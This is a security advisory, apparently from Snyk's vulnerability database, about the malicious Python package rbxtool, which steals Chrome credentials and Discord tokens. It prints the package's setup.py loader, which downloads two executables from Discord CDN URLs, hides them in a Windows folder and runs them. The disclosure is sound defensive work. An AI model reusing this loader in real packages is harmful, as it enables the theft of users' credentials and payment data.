Homepage

Malicious Package Affecting rbxtool package, versions [0,]

Severity

 Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Mature

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-RBXTOOL-2980418
  • published15 Aug 2022
  • disclosed15 Aug 2022
  • creditSnyk Research Team
Report a new vulnerability Found a mistake?

Introduced: 15 Aug 2022

Malicious CVE NOT AVAILABLE CWE-506  (opens in a new tab)
First added by Snyk

How to fix?

Avoid using all malicious instances of the rbxtool package.

Overview

rbxtool is a malicious package. This is one of 12 malicious packages created by the same actor and discovered by Snyk. It downloads and executes malicious exe files containing malicious code that attempts to steal information from Google Chrome, tokens from Discord, and Injects a Discord malware.

These malicious packages attempted to avoid detection while infiltrating Windows machines and executing malicious executable files downloaded from the Discord content delivery network (CDN) onto the host.

These packages utilized PyInstaller to bundle a malicious application and its dependencies into one package. The purpose of PyInstaller here is twofold: to inhibit detection by bundling in dependencies instead of downloading them from a remote server to the host, and to provide an executable that is ready to run without an interpreter.

This malware targets data that is stored for everyday user applications. Upon execution, it will attempt to steal Google Chrome data (passwords, cookies, web history, search history, and bookmarks). This data is a common target for malicious actors as they can then use this data to pivot throughout accounts with the provided credentials.

The popular online chat application, Discord, is also a target. The malware exfiltrates Discord tokens and injects a persistent malicious agent in the process. This malicious code, known as Discord Injector, can relay an alarming amount of information to the attacker. Not only will it share credentials, but it can also skim credit card information if it has been input by a user it after the injector is loaded.

Malicious Code

The setup.py code attempts to download and execute two binaries (ZYXMN.exe and ZYRBX.exe)from a Discord CDN: 

url = 'https://cdn.discordapp.com/attachments/1003368479442874518/1003368774335991898/ZYXMN.exe'
url2 = 'https://cdn.discordapp.com/attachments/1003368479442874518/1003368773983682592/ZYRBX.exe'


os.remove(r"C:$Windows.SXK\WIN-siP1VyGDrfCYO2k3.exe")
os.remove(r"C:$Windows.SXK\WIN-XnWfTdfJsypQWB9d.exe")


r = requests.get(url, allow_redirects=True)
r2 = requests.get(url2, allow_redirects=True)
open('ZYXMN.exe', 'wb').write(r.content)
Path(r"ZYXMN.exe").rename(r"C:$Windows.SXK\WIN-siP1VyGDrfCYO2k3.exe")
open('ZYRBX.exe', 'wb').write(r2.content)
Path(r"ZYRBX.exe").rename(r"C:$Windows.SXK\WIN-XnWfTdfJsypQWB9d.exe")
os.remove('ZYRBX.exe')
os.remove('ZYXMN.exe')


os.startfile(r"C:$Windows.SXK\WIN-siP1VyGDrfCYO2k3.exe") os.startfile(r"C:$Windows.SXK\WIN-XnWfTdfJsypQWB9d.exe")


shutil.rmtree(r"C:$Windows.~SXK")

A full breakdown and explanation of these two executables is found in our writeup

CVSS Scores

version 3.1